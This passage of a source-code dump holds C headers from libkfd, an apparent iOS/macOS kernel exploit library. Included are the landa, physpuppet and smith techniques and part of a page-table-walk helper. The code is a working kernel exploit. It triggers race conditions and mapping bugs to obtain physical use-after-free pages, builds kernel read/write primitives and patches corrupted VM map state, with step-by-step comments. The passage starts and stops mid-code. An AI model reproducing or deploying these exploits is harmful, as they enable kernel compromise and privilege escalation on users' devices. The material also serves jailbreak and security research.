(ptov_table[i].pa + ptov_table[i].len))) { return pa - ptov_table[i].pa + ptov_table[i].va; } } // assert(!((pa < gPhysBase) || ((pa - gPhysBase) >= gPhysSize))); return pa - gPhysBase + gVirtBase; } u64 vtophys(struct kfd* kfd, u64 va) { const u64 ROOT_LEVEL = PMAP_TT_L1_LEVEL; const u64 LEAF_LEVEL = PMAP_TT_L3_LEVEL; u64 pa = 0; u64 tt_kaddr = (va >> 63) ? kfd->perf.ttbr[1].va : kfd->perf.ttbr[0].va; for (u64 cur_level = ROOT_LEVEL; cur_level <= LEAF_LEVEL; cur_level++) { u64 offmask, shift, index_mask, valid_mask, type_mask, type_block; switch (cur_level) { case PMAP_TT_L0_LEVEL: { offmask = ARM_16K_TT_L0_OFFMASK; shift = ARM_16K_TT_L0_SHIFT; index_mask = ARM_16K_TT_L0_INDEX_MASK; valid_mask = ARM_TTE_VALID; type_mask = ARM_TTE_TYPE_MASK; type_block = ARM_TTE_TYPE_BLOCK; break; } case PMAP_TT_L1_LEVEL: { offmask = ARM_16K_TT_L1_OFFMASK; shift = ARM_16K_TT_L1_SHIFT; index_mask = ARM_16K_TT_L1_INDEX_MASK; valid_mask = ARM_TTE_VALID; type_mask = ARM_TTE_TYPE_MASK; type_block = ARM_TTE_TYPE_BLOCK; break; } case PMAP_TT_L2_LEVEL: { offmask = ARM_16K_TT_L2_OFFMASK; shift = ARM_16K_TT_L2_SHIFT; index_mask = ARM_16K_TT_L2_INDEX_MASK; valid_mask = ARM_TTE_VALID; type_mask = ARM_TTE_TYPE_MASK; type_block = ARM_TTE_TYPE_BLOCK; break; } case PMAP_TT_L3_LEVEL: { offmask = ARM_16K_TT_L3_OFFMASK; shift = ARM_16K_TT_L3_SHIFT; index_mask = ARM_16K_TT_L3_INDEX_MASK; valid_mask = ARM_PTE_TYPE_VALID; type_mask = ARM_PTE_TYPE_MASK; type_block = ARM_TTE_TYPE_L3BLOCK; break; } default: { assert_false("bad pmap tt level"); return 0; } } u64 tte_index = (va & index_mask) >> shift; u64 tte_kaddr = tt_kaddr + (tte_index * sizeof(u64)); u64 tte = 0; kread((u64)(kfd), tte_kaddr, &tte, sizeof(tte)); if ((tte & valid_mask) != valid_mask) { return 0; } if ((tte & type_mask) == type_block) { pa = ((tte & ARM_TTE_PA_MASK & ~offmask) | (va & offmask)); break; } tt_kaddr = phystokv(kfd, tte & ARM_TTE_TABLE_MASK); } return pa; } #endif /* perf_h */ ================================================ FILE: usprebooter/libkfd/puaf/landa.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef landa_h #define landa_h const u64 landa_vme1_size = pages(1); const u64 landa_vme2_size = pages(1); const u64 landa_vme4_size = pages(1); // Forward declarations for helper functions. void* landa_helper_spinner_pthread(void* arg); struct landa_data { atomic_bool main_thread_returned; atomic_bool spinner_thread_started; vm_address_t copy_src_address; vm_address_t copy_dst_address; vm_size_t copy_size; }; void landa_init(struct kfd* kfd) { kfd->puaf.puaf_method_data_size = sizeof(struct landa_data); kfd->puaf.puaf_method_data = malloc_bzero(kfd->puaf.puaf_method_data_size); } void landa_run(struct kfd* kfd) { struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); /* * Note: * - The size of [src/dst]_vme_3 must be equal to pages(X), i.e. the desired PUAF size. * - The copy_size must be greater than msg_ool_size_small (32 KiB), therefore it is * sufficient for [src/dst]_vme_1 and [src/dst]_vme_2 to have a size of pages(1). */ u64 landa_vme3_size = pages(kfd->puaf.number_of_puaf_pages); vm_size_t copy_size = landa_vme1_size + landa_vme2_size + landa_vme3_size; landa->copy_size = copy_size; /* * STEP 1A: * * Allocate the source VMEs and VMOs: * - src_vme_1 has a size of pages(1) and owns the only reference to src_vmo_1. * - src_vme_2 has a size of pages(1) and owns the only reference to src_vmo_2. * - src_vme_3 has a size of pages(X) and owns the only reference to src_vmo_3. */ vm_address_t src_address = 0; vm_size_t src_size = copy_size; assert_mach(vm_allocate(mach_task_self(), &src_address, src_size, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR)); landa->copy_src_address = src_address; vm_address_t vme1_src_address = src_address; vm_address_t vme2_src_address = vme1_src_address + landa_vme1_size; vm_address_t vme3_src_address = vme2_src_address + landa_vme2_size; assert_mach(vm_allocate(mach_task_self(), &vme1_src_address, landa_vme1_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); assert_mach(vm_allocate(mach_task_self(), &vme2_src_address, landa_vme2_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); assert_mach(vm_allocate(mach_task_self(), &vme3_src_address, landa_vme3_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); memset((void*)(src_address), 'A', copy_size); /* * STEP 1B: * * Allocate the destination VMEs and VMOs: * - dst_vme_1 has a size of pages(1) and owns the only reference to dst_vmo_1. * dst_vme_1->user_wired_count == MAX_WIRE_COUNT, because of the mlock() for-loop. * - dst_vme_2 has a size of pages(1) and owns the only reference to dst_vmo_2. * dst_vme_2->is_shared == TRUE, because of the vm_remap() on itself. * dst_vme_2->user_wired_count == 1, because of mlock(). * - After the clip in vm_protect(), dst_vme_3 has a size of pages(X) and dst_vme_4 has a size of pages(1). * dst_vme_3 and dst_vme_4 each have a reference to dst_vmo_3. */ vm_address_t dst_address = 0; vm_size_t dst_size = copy_size + landa_vme4_size; assert_mach(vm_allocate(mach_task_self(), &dst_address, dst_size, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR)); landa->copy_dst_address = dst_address; vm_address_t vme1_dst_address = dst_address; vm_address_t vme2_dst_address = vme1_dst_address + landa_vme1_size; vm_address_t vme3_dst_address = vme2_dst_address + landa_vme2_size; vm_address_t vme4_dst_address = vme3_dst_address + landa_vme3_size; vm_prot_t cur_protection = VM_PROT_DEFAULT; vm_prot_t max_protection = VM_PROT_ALL; assert_mach(vm_allocate(mach_task_self(), &vme1_dst_address, landa_vme1_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); assert_mach(vm_allocate(mach_task_self(), &vme2_dst_address, landa_vme2_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); assert_mach(vm_remap(mach_task_self(), &vme2_dst_address, landa_vme2_size, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, mach_task_self(), vme2_dst_address, FALSE, &cur_protection, &max_protection, VM_INHERIT_DEFAULT)); assert_mach(vm_allocate(mach_task_self(), &vme3_dst_address, landa_vme3_size + landa_vme4_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); assert_mach(vm_protect(mach_task_self(), vme4_dst_address, landa_vme4_size, FALSE, VM_PROT_READ)); memset((void*)(dst_address), 'B', copy_size); for (u64 i = 0; i < UINT16_MAX; i++) { assert_bsd(mlock((void*)(vme1_dst_address), landa_vme1_size)); } assert_bsd(mlock((void*)(vme2_dst_address), landa_vme2_size)); /* * STEP 2: * * Trigger the race condition between vm_copy() in the main thread and mlock() in the spinner thread. */ pthread_t spinner_thread = NULL; assert_bsd(pthread_create(&spinner_thread, NULL, landa_helper_spinner_pthread, kfd)); while (!atomic_load(&landa->spinner_thread_started)) { usleep(10); } assert_mach(vm_copy(mach_task_self(), src_address, copy_size, dst_address)); atomic_store(&landa->main_thread_returned, true); assert_bsd(pthread_join(spinner_thread, NULL)); /* * STEP 3: * * Deallocate dst_vme_4, which will in turn deallocate the last reference of dst_vmo_3. * Therefore, dst_vmo_3 will be reaped and its pages put back on the free list. * However, we now have a PUAF on up to X of those pages in the VA range of dst_vme_3. */ assert_mach(vm_deallocate(mach_task_self(), vme4_dst_address, landa_vme4_size)); for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { kfd->puaf.puaf_pages_uaddr[i] = vme3_dst_address + pages(i); } } void landa_cleanup(struct kfd* kfd) { struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); u64 min_puaf_page_uaddr = min(kread_page_uaddr, kwrite_page_uaddr); u64 max_puaf_page_uaddr = max(kread_page_uaddr, kwrite_page_uaddr); assert_mach(vm_deallocate(mach_task_self(), landa->copy_src_address, landa->copy_size)); vm_address_t address1 = landa->copy_dst_address; vm_size_t size1 = min_puaf_page_uaddr - landa->copy_dst_address; assert_mach(vm_deallocate(mach_task_self(), address1, size1)); vm_address_t address2 = max_puaf_page_uaddr + pages(1); vm_size_t size2 = (landa->copy_dst_address + landa->copy_size) - address2; assert_mach(vm_deallocate(mach_task_self(), address2, size2)); /* * No middle block if the kread and kwrite pages are the same or back-to-back. */ if ((max_puaf_page_uaddr - min_puaf_page_uaddr) > pages(1)) { vm_address_t address3 = min_puaf_page_uaddr + pages(1); vm_size_t size3 = (max_puaf_page_uaddr - address3); assert_mach(vm_deallocate(mach_task_self(), address3, size3)); } } void landa_free(struct kfd* kfd) { u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr, pages(1))); if (kwrite_page_uaddr != kread_page_uaddr) { assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr, pages(1))); } } /* * Helper landa functions. */ void* landa_helper_spinner_pthread(void* arg) { struct kfd* kfd = (struct kfd*)(arg); struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); atomic_store(&landa->spinner_thread_started, true); while (!atomic_load(&landa->main_thread_returned)) { kern_return_t kret = mlock((void*)(landa->copy_dst_address), landa->copy_size); assert((kret == KERN_SUCCESS) || ((kret == (-1)) && (errno == ENOMEM))); if (kret == KERN_SUCCESS) { break; } } return NULL; } #endif /* landa_h */ ================================================ FILE: usprebooter/libkfd/puaf/physpuppet.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef physpuppet_h #define physpuppet_h const u64 physpuppet_vmne_size = pages(2) + 1; const u64 physpuppet_vme_offset = pages(1); const u64 physpuppet_vme_size = pages(2); void physpuppet_init(struct kfd* kfd) { /* * Nothing to do. */ return; } void physpuppet_run(struct kfd* kfd) { for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { /* * STEP 1: * * Create a vm_named_entry. It will be backed by a vm_object with a * vo_size of 3 pages and an initial ref_count of 1. */ mach_port_t named_entry = MACH_PORT_NULL; assert_mach(mach_memory_object_memory_entry_64(mach_host_self(), true, physpuppet_vmne_size, VM_PROT_DEFAULT, MEMORY_OBJECT_NULL, &named_entry)); /* * STEP 2: * * Map the vm_named_entry into our vm_map. This will create a * vm_map_entry with a vme_start that is page-aligned, but a vme_end * that is not (vme_end = vme_start + 1 page + 1 byte). The new * vm_map_entry's vme_object is shared with the vm_named_entry, and * therefore its ref_count goes up to 2. Finally, the new vm_map_entry's * vme_offset is 1 page. */ vm_address_t address = 0; assert_mach(vm_map(mach_task_self(), &address, (-1), 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR, named_entry, physpuppet_vme_offset, false, VM_PROT_DEFAULT, VM_PROT_DEFAULT, VM_INHERIT_DEFAULT)); /* * STEP 3: * * Fault in both pages covered by the vm_map_entry. This will populate * the second and third vm_pages (by vmp_offset) of the vm_object. Most * importantly, this will set the two L3 PTEs covered by that virtual * address range with read and write permissions. */ memset((void*)(address), 'A', physpuppet_vme_size); /* * STEP 4: * * Unmap that virtual address range. Crucially, when vm_map_delete() * calls pmap_remove_options(), only the first L3 PTE gets cleared. The * vm_map_entry is deallocated and therefore the vm_object's ref_count * goes down to 1. */ assert_mach(vm_deallocate(mach_task_self(), address, physpuppet_vme_size)); /* * STEP 5: * * Destroy the vm_named_entry. The vm_object's ref_count drops to 0 and * therefore is reaped. This will put all of its vm_pages on the free * list without calling pmap_disconnect(). */ assert_mach(mach_port_deallocate(mach_task_self(), named_entry)); kfd->puaf.puaf_pages_uaddr[i] = address + physpuppet_vme_offset; /* * STEP 6: * * At this point, we have a dangling L3 PTE. However, there's a * discrepancy between the vm_map and the pmap. If not fixed, it will * cause a panic when the process exits. Therefore, we need to reinsert * a vm_map_entry in that virtual address range. We also need to fault * in the first page to populate the vm_object. Otherwise, * vm_map_delete() won't call pmap_remove_options() on exit. But we * don't fault in the second page to avoid overwriting our dangling PTE. */ assert_mach(vm_allocate(mach_task_self(), &address, physpuppet_vme_size, VM_FLAGS_FIXED)); memset((void*)(address), 'A', physpuppet_vme_offset); } } void physpuppet_cleanup(struct kfd* kfd) { u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i]; if ((puaf_page_uaddr == kread_page_uaddr) || (puaf_page_uaddr == kwrite_page_uaddr)) { continue; } assert_mach(vm_deallocate(mach_task_self(), puaf_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size)); } } void physpuppet_free(struct kfd* kfd) { u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size)); if (kwrite_page_uaddr != kread_page_uaddr) { assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size)); } } #endif /* physpuppet_h */ ================================================ FILE: usprebooter/libkfd/puaf/smith.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef smith_h #define smith_h /* * This boolean parameter determines whether the vm_map_lock() is taken from * another thread before attempting to clean up the VM map in the main thread. */ const bool take_vm_map_lock = true; // Forward declarations for helper functions. void smith_helper_init(struct kfd* kfd); void* smith_helper_spinner_pthread(void* arg); void* smith_helper_cleanup_pthread(void* arg); void smith_helper_cleanup(struct kfd* kfd); /* * This structure is allocated once in smith_init() and contains all the data * needed/shared across multiple functions for the PUAF part of the exploit. */ struct smith_data { atomic_bool main_thread_returned; atomic_int started_spinner_pthreads; struct { vm_address_t address; vm_size_t size; } vme[5]; struct { pthread_t pthread; atomic_bool should_start; atomic_bool did_start; atomic_uintptr_t kaddr; atomic_uintptr_t right; atomic_uintptr_t max_address; } cleanup_vme; }; /* * This function is responsible for the following: * 1. Allocate the singleton "smith_data" structure. See the comment above the * smith_data structure for more info. * 2. Call smith_helper_init() which is responsible to initialize everything * needed for the PUAF part of the exploit. See the comment above * smith_helper_init() for more info. */ void smith_init(struct kfd* kfd) { kfd->puaf.puaf_method_data_size = sizeof(struct smith_data); kfd->puaf.puaf_method_data = malloc_bzero(kfd->puaf.puaf_method_data_size); smith_helper_init(kfd); } /* * This function is responsible to run the bulk of the work, from triggering the * initial vulnerability to achieving a PUAF on an arbitrary number of pages. * It is described in detail in the write-up, with a figure illustrating the * relevant kernel state after each step. */ void smith_run(struct kfd* kfd) { struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data); /* * STEP 1: */ assert_mach(vm_allocate(mach_task_self(), &smith->vme[2].address, smith->vme[2].size, VM_FLAGS_FIXED)); assert_mach(vm_allocate(mach_task_self(), &smith->vme[1].address, smith->vme[1].size, VM_FLAGS_FIXED)); assert_mach(vm_allocate(mach_task_self(), &smith->vme[0].address, smith->vme[0].size, VM_FLAGS_FIXED)); assert_mach(vm_allocate(mach_task_self(), &smith->vme[3].address, smith->vme[3].size, VM_FLAGS_FIXED | VM_FLAGS_PURGABLE)); assert_mach(vm_allocate(mach_task_self(), &smith->vme[4].address, smith->vme[4].size, VM_FLAGS_FIXED | VM_FLAGS_PURGABLE)); /* * STEP 2: * * Note that vm_copy() in the main thread corresponds to substep 2A in the write-up * and vm_protect() in the spawned threads corresponds to substep 2B. */ const u64 number_of_spinner_pthreads = 4; pthread_t spinner_pthreads[number_of_spinner_pthreads] = {}; for (u64 i = 0; i < number_of_spinner_pthreads; i++) { assert_bsd(pthread_create(&spinner_pthreads[i], NULL, smith_helper_spinner_pthread, kfd)); } while (atomic_load(&smith->started_spinner_pthreads) != number_of_spinner_pthreads) { usleep(10); } assert(vm_copy(mach_task_self(), smith->vme[2].address, (0ull - smith->vme[2].address - 1), 0) == KERN_PROTECTION_FAILURE); atomic_store(&smith->main_thread_returned, true); for (u64 i = 0; i < number_of_spinner_pthreads; i++) { /* * I am not sure if joining the spinner threads here will cause the * deallocation of their stack in the VM map. I have never ran into * panics because of this, but it is something to keep in mind. * Otherwise, if it becomes a problem, we can simply make those spinner * threads sleep in a loop until the main thread sends them a signal * that the cleanup is finished. */ assert_bsd(pthread_join(spinner_pthreads[i], NULL)); } /* * STEP 3: */ assert_mach(vm_copy(mach_task_self(), smith->vme[3].address, smith->vme[3].size, smith->vme[1].address)); memset((void*)(smith->vme[1].address), 'A', smith->vme[1].size); /* * STEP 4: */ assert_mach(vm_protect(mach_task_self(), smith->vme[1].address, smith->vme[3].size, false, VM_PROT_DEFAULT)); /* * STEP 5: */ assert_mach(vm_copy(mach_task_self(), smith->vme[4].address, smith->vme[4].size, smith->vme[0].address)); for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) { kfd->puaf.puaf_pages_uaddr[i] = smith->vme[1].address + pages(i); } } /* * This function is responsible for the following: * 1. Call smith_helper_cleanup() which is responsible to patch up the corrupted * state of our VM map. Technically, this is the only thing that is required * to get back to a safe state, which means there is no more risk of a kernel * panic if the process exits or performs any VM operation. * 2. Deallocate the unused virtual memory that we allocated in step 1 of * smith_run(). In other words, we call vm_deallocate() for the VA range * covered by those 5 map entries (i.e. vme0 to vme4 in the write-up), except * for the two pages used by the kread/kwrite primitive. This step is not * required for "panic-safety". */ void smith_cleanup(struct kfd* kfd) { smith_helper_cleanup(kfd); struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data); u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); u64 min_puaf_page_uaddr = min(kread_page_uaddr, kwrite_page_uaddr); u64 max_puaf_page_uaddr = max(kread_page_uaddr, kwrite_page_uaddr); vm_address_t address1 = smith->vme[0].address; vm_size_t size1 = smith->vme[0].size + (min_puaf_page_uaddr - smith->vme[1].address); assert_mach(vm_deallocate(mach_task_self(), address1, size1)); vm_address_t address2 = max_puaf_page_uaddr + pages(1); vm_size_t size2 = (smith->vme[2].address - address2) + smith->vme[2].size + smith->vme[3].size + smith->vme[4].size; assert_mach(vm_deallocate(mach_task_self(), address2, size2)); /* * No middle block if the kread and kwrite pages are the same or back-to-back. */ if ((max_puaf_page_uaddr - min_puaf_page_uaddr) > pages(1)) { vm_address_t address3 = min_puaf_page_uaddr + pages(1); vm_size_t size3 = (max_puaf_page_uaddr - address3); assert_mach(vm_deallocate(mach_task_self(), address3, size3)); } } /* * This function is responsible to deallocate the virtual memory for the two * pages used by the kread/kwrite primitive, i.e. the two pages that we did not * deallocate during smith_cleanup(). Once again, this step is not required for * "panic-safety". It can be called either if the kread/kwrite primitives no * longer rely on kernel objects that are controlled through the PUAF primitive, * or if we want to completely tear down the exploit. */ void smith_free(struct kfd* kfd) { u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr); u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr); assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr, pages(1))); if (kwrite_page_uaddr != kread_page_uaddr) { assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr, pages(1))); } } /* * This function is responsible for the following: * 1. If the constant "target_hole_size" is non-zero, it will allocate every * hole in our VM map starting at its min_offset, until we find a hole at * least as big as that value (e.g. 10k pages). The reason for that is that * we will corrupt the hole list when we trigger the vulnerability in * smith_run(), such that only the first hole is safe to allocate from. This * is exactly what happens during a typical call to vm_allocate() with * VM_FLAGS_ANYWHERE. That said, many other VM operations that modify our map * entries or our hole list could cause a kernel panic. So, if it is possible * at all, it is much safer to suspend all other threads running in the target * process (e.g. WebContent). In that case, since we would control the only * running threads during the critical section, we could guarantee that no * unsafe VM operations will happen and "target_hole_size" can be set to 0. * 2. We need to find the VA range from which we will allocate our 5 map entries * in smith_run() during step 1 (i.e. vme0 to vme4 in the write-up). Those 5 * map entries will cover (3X+5) pages, where X is the desired number of * PUAF pages. For reasons that are explained in the write-up, we want to * allocate them towards the end of our VM map. Therefore, we find the last * hole that is big enough to hold our 5 map entries. */ void smith_helper_init(struct kfd* kfd) { const u64 target_hole_size = pages(0); bool found_target_hole = false; struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data); smith->vme[0].size = pages(1); smith->vme[1].size = pages(kfd->puaf.number_of_puaf_pages); smith->vme[2].size = pages(1); smith->vme[3].size = (smith->vme[1].size + smith->vme[2].size); smith->vme[4].size = (smith->vme[0].size + smith->vme[3].size); u64 smith_total_size = (smith->vme[3].size + smith->vme[4].size + smith->vme[4].size); u64 min_address, max_address; puaf_helper_get_vm_map_min_and_max(&min_address, &max_address); /* * If the boolean parameter "take_vm_map_lock" is turned on, we spawn the * thread running smith_helper_cleanup_pthread() right here. Please see the * comment above smith_helper_cleanup_pthread() for more info. */ if (take_vm_map_lock) { atomic_store(&smith->cleanup_vme.max_address, max_address); assert_bsd(pthread_create(&smith->cleanup_vme.pthread, NULL, smith_helper_cleanup_pthread, kfd)); } vm_address_t address = 0; vm_size_t size = 0; vm_region_basic_info_data_64_t data = {}; vm_region_info_t info = (vm_region_info_t)(&data); mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64; mach_port_t port = MACH_PORT_NULL; vm_address_t vme0_address = 0; vm_address_t prev_vme_end = 0; while (true) { kern_return_t kret = vm_region_64(mach_task_self(), &address, &size, VM_REGION_BASIC_INFO_64, info, &count, &port); if ((kret == KERN_INVALID_ADDRESS) || (address >= max_address)) { if (found_target_hole) { vm_size_t last_hole_size = max_address - prev_vme_end; /* * If "target_hole_size" is zero, we could instead simply set * "vme0_address" to (map->max_offset - smith_total_size), * after making sure that this VA range is not already mapped. */ if (last_hole_size >= (smith_total_size + pages(1))) { vme0_address = (max_address - smith_total_size); } } break; } assert(kret == KERN_SUCCESS); /* * Quick hack: pre-fault code pages to avoid faults during the critical section. */ if (data.protection & VM_PROT_EXECUTE) { for (u64 page_address = address; page_address < address + size; page_address += pages(1)) { u64 tmp_value = *(volatile u64*)(page_address); } } vm_address_t hole_address = prev_vme_end; vm_size_t hole_size = address - prev_vme_end; if (prev_vme_end < min_address) { goto next_vm_region; } if (found_target_hole) { if (hole_size >= (smith_total_size + pages(1))) { vme0_address = (address - smith_total_size); } } else { if (hole_size >= target_hole_size) { found_target_hole = true; } else if (hole_size > 0) { assert_mach(vm_allocate(mach_task_self(), &hole_address, hole_size, VM_FLAGS_FIXED)); } } next_vm_region: address += size; size = 0; prev_vme_end = address; } assert(found_target_hole); smith->vme[0].address = vme0_address; smith->vme[1].address = smith->vme[0].address + smith->vme[0].size; smith->vme[2].address = smith->vme[1].address + smith->vme[1].size; smith->vme[3].address = smith->vme[2].address + smith->vme[2].size; smith->vme[4].address = smith->vme[3].address + smith->vme[3].size; } /* * This function is ran by 4 spinner threads spawned from smith_run() in step 2. * It simply attempts to change the protection of virtual page zero to * VM_PROT_WRITE in a busy-loop, which will return KERN_INVALID_ADDRESS until * the main thread triggers the bad clip in vm_map_copyin_internal(). At that * point, vm_protect() will return KERN_SUCCESS. Finally, once the main thread * returns from vm_copy(), it will set "main_thread_returned" to true in order * to signal all 4 spinner threads to exit. */ void* smith_helper_spinner_pthread(void* arg) { struct kfd* kfd = (struct kfd*)(arg); struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data); atomic_fetch_add(&smith->started_spinner_pthreads, 1); while (!atomic_load(&smith->main_thread_returned)) { kern_return_t kret = vm_protect(mach_task_self(), 0, pages(1), false, VM_PROT_WRITE); assert((kret == KERN_SUCCESS) || (kret == KERN_INVALID_ADDRESS)); } return NULL; } /* * This function is only ran from a thread spawned in smith_helper_init() if the * boolean parameter "take_vm_map_lock" is turned on. The reason why it is * spawned that early, instead of at the beginning of smith_helper_cleanup(), is * that pthread creation will allocate virtual memory for its stack, which might * cause a kernel panic because we have not patched the corrupted VM map state * yet. It sleeps for 1 ms in a loop until the main thread sets * "cleanup_vme.should_start" to true to signal this thread to start the * procedure to take the vm_map_lock(). It does so by patching the right child * of a map entry to point back to itself, then it sets "cleanup_vme.did_start" * to true to signal the main thread to start patching the state, and finally it * calls vm_protect(), which will take the vm_map_lock() indefinitely while * vm_map_lookup_entry() spins on the right child. Once the main thread has * finished patching up the state, it will restore the right child to its * original value, which will cause vm_protect() to return and this pthread to * exit. */ void* smith_helper_cleanup_pthread(void* arg) { struct kfd* kfd = (struct kfd*)(arg); struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data); vm_address_t max_address = atomic_load(&smith->cleanup_vme.max_address); vm_address_t cleanup_vme_end = 0; while (!atomic_load(&smith->cleanup_vme.should_start)) { usleep(1000); } do { /* * Find the last entry with vme_end smaller than the map's max_offset, * with a right child that is not null, but not the entry we are going to leak. */ u64 map_kaddr = kfd->info.kaddr.current_map; u64 entry_kaddr = kget_u64(_vm_map__hdr__links__prev, map_kaddr); while (true) { u64 entry_prev = kget_u64(vm_map_entry__links__prev, entry_kaddr); u64 entry_start = kget_u64(vm_map_entry__links__start, entry_kaddr); u64 entry_end = kget_u64(vm_map_entry__links__end, entry_kaddr); u64 entry_right = kget_u64(vm_map_entry__store__entry__rbe_right, entry_kaddr); if ((entry_end < max_address) && (entry_right != 0) && (entry_start != 0)) { /* * Patch the entry to have its right child point to itself. */ atomic_store(&smith->cleanup_vme.kaddr, entry_kaddr); atomic_store(&smith->cleanup_vme.right, entry_right); u64 store_kaddr = entry_kaddr + kfd_offset(vm_map_entry__store__entry__rbe_left); kset_u64(vm_map_entry__store__entry__rbe_right, store_kaddr, entry_kaddr); cleanup_vme_end = entry_end; break; } entry_kaddr = entry_prev; } } while (0); atomic_store(&smith->cleanup_vme.did_start, true); vm_protect(mach_task_self(), cleanup_vme_end, pages(1), false, VM_PROT_ALL); return NULL; } #define vme_for_store(kaddr) ((kaddr) ? (((kaddr) - kfd_offset(vm_map_entry__store__entry__rbe_left)) & (~1ull)) : (kaddr)) /* * This function is responsible to patch the corrupted state of our VM map. If * the boolean parameter "take_vm_map_lock" is turned on, please see the comment * above smith_helper_cleanup_pthread() for more info. Otherwise, the rest of * the function simply uses the kread primitive to scan the doubly-linked list * of map entries as well as the hole list, and the kwrite primitive to patch it * up. This procedure is explained in detail in part C of the write-up. */ void smith_helper_cleanup(struct kfd* kfd) { assert(kfd->info.kaddr.current_map); struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data); if (take_vm_map_lock) { atomic_store(&smith->cleanup_vme.should_start, true); while (!atomic_load(&smith->cleanup_vme.did_start)) { usleep(10); } /* * Sleep an extra 100 us to make sure smith_helper_cleanup_pthread() * had the time to take the vm_map_lock(). */ usleep(100); } u64 map_kaddr = kfd->info.kaddr.current_map; do { /* * Scan map entries: we use the kread primitive to loop through every * map entries in our VM map, and record the information that we need to * patch things up below. There are some assertions along the way to * make sure the state of the VM map is corrupted as expected. */ u64 entry_count = 0; u64 entry_kaddr = kget_u64(_vm_map__hdr__links__next, map_kaddr); u64 map_entry_kaddr = map_kaddr + kfd_offset(_vm_map__hdr__links__prev); u64 first_vme_kaddr = 0; u64 first_vme_parent_store = 0; u64 second_vme_kaddr = 0; u64 second_vme_left_store = 0; u64 vme_end0_kaddr = 0; u64 vme_end0_start = 0; u64 leaked_entry_right_store = 0; u64 leaked_entry_parent_store = 0; u64 leaked_entry_prev = 0; u64 leaked_entry_next = 0; u64 leaked_entry_end = 0; while (entry_kaddr != map_entry_kaddr) { entry_count++; u64 entry_next = kget_u64(vm_map_entry__links__next, entry_kaddr); u64 entry_start = kget_u64(vm_map_entry__links__start, entry_kaddr); u64 entry_end = kget_u64(vm_map_entry__links__end, entry_kaddr); if (entry_count == 1) { first_vme_kaddr = entry_kaddr; first_vme_parent_store = kget_u64(vm_map_entry__store__entry__rbe_parent, entry_kaddr); u64 first_vme_left_store = kget_u64(vm_map_entry__store__entry__rbe_left, entry_kaddr); u64 first_vme_right_store = kget_u64(vm_map_entry__store__entry__rbe_right, entry_kaddr); assert(first_vme_left_store == 0); assert(first_vme_right_store == 0); } else if (entry_count == 2) { second_vme_kaddr = entry_kaddr; second_vme_left_store = kget_u64(vm_map_entry__store__entry__rbe_left, entry_kaddr); } else if (entry_end == 0) { vme_end0_kaddr = entry_kaddr; vme_end0_start = entry_start; assert(vme_end0_start == smith->vme[1].address); } else if (entry_start == 0) { assert(entry_kaddr == vme_for_store(first_vme_parent_store)); assert(entry_kaddr == vme_for_store(second_vme_left_store)); u64 leaked_entry_left_store = kget_u64(vm_map_entry__store__entry__rbe_left, entry_kaddr); leaked_entry_right_store = kget_u64(vm_map_entry__store__entry__rbe_right, entry_kaddr); leaked_entry_parent_store = kget_u64(vm_map_entry__store__entry__rbe_parent, entry_kaddr); assert(leaked_entry_left_store == 0); assert(vme_for_store(leaked_entry_right_store) == first_vme_kaddr); assert(vme_for_store(leaked_entry_parent_store) == second_vme_kaddr); leaked_entry_prev = 